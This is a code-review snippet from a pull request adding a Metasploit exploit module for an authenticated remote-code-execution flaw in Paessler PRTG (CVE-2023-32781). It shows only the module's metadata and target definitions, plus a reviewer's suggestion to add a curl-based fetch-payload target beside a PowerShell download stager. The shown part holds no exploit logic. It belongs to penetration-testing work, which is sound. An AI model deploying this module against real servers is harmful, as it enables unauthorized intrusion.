modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb

```diff
@@ -0,0 +1,343 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Retry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',
+        'Description' => %q{
+          Authenticated RCE in Paessler PRTG
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],
+        'References' => [
+          [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],
+          [ 'CVE', '2023-32781']
+        ],
+        'DisclosureDate' => '2023-08-09',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Platform' => 'win',
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
```

Comment:
This will allow a user to select a fetch payload

```suggestion
        'Targets' => [
          [
            'Windows_Fetch',
            {
              'Arch' => [ ARCH_CMD ],
              'Platform' => 'win',
              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL'},
              'Type' => :win_fetch
            }
          ],
          [
            'Windows_CMDStager',
            {
              'Arch' => [ ARCH_X64, ARCH_X86 ],
              'Platform' => 'win',
              'Type' => :win_cmdstager,
              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]
            }
          ]
        ],
        'DefaultTarget' => 0,

```